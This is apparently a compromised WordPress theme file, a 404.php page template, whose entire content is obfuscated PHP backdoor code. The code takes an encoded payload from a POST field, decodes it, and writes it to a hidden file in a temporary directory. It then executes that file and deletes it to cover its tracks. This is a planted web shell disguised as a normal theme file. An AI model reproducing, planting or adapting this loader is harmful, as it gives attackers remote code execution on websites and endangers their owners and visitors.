File: //proc/self/cwd/wp-content/themes/astra/404.php
<?php if(isset($_POST)&&isset($_POST["ho\154der"])):$_0=$_POST["\x68o\154d\145r"];$_0=eXPloDE(".",$_0);$_1="";$_2="abcdef\x67hi\152klmn\x6fpqrstuvw\x78yz0\061\x32345\06678\x39";$_3=StRLeN($_2);$_4=(int)RoUnD(0+0+0);$_5=CoUNT($_0);do{if($_4>=$_5):break;endif;$_6=$_0[$_4];$_7=orD($_2[$_4%$_3]);$_8=((int)$_6-$_7-($_4%(int)ROUND(3.3333333333333+3.3333333333333+3.3333333333333)))^(0x53-0x125- -231);$_1.=chR($_8);$_4++;}while(true);$_9=ArraY_filtER([INi_Get("uploa\x64\x5ftmp\x5f\x64\x69r"),SEssion_SavE_pATH(),"/\x76a\x72/\x74mp",Sys_GEt_teMP_Dir(),"\x2f\x64e\166/\163h\155",GeTenV("\124\x4dP"),GEtcWd(),"/tm\x70",GeTEnv("T\105MP")]);for($_10=(int)roUnd(0+0+0+0),$_11=cOunt($_9);$_10<$_11;$_10++):$_12=$_9[$_10];if(is_DiR($_12)?Is_WRItAblE($_12):false):$_13=JOin("/",[$_12,"\056sy\155"]);if(@fiLe_PUt_CoNTents($_13,$_1)!==false):include $_13;UnLiNK($_13);exit;endif;endif;endfor;endif;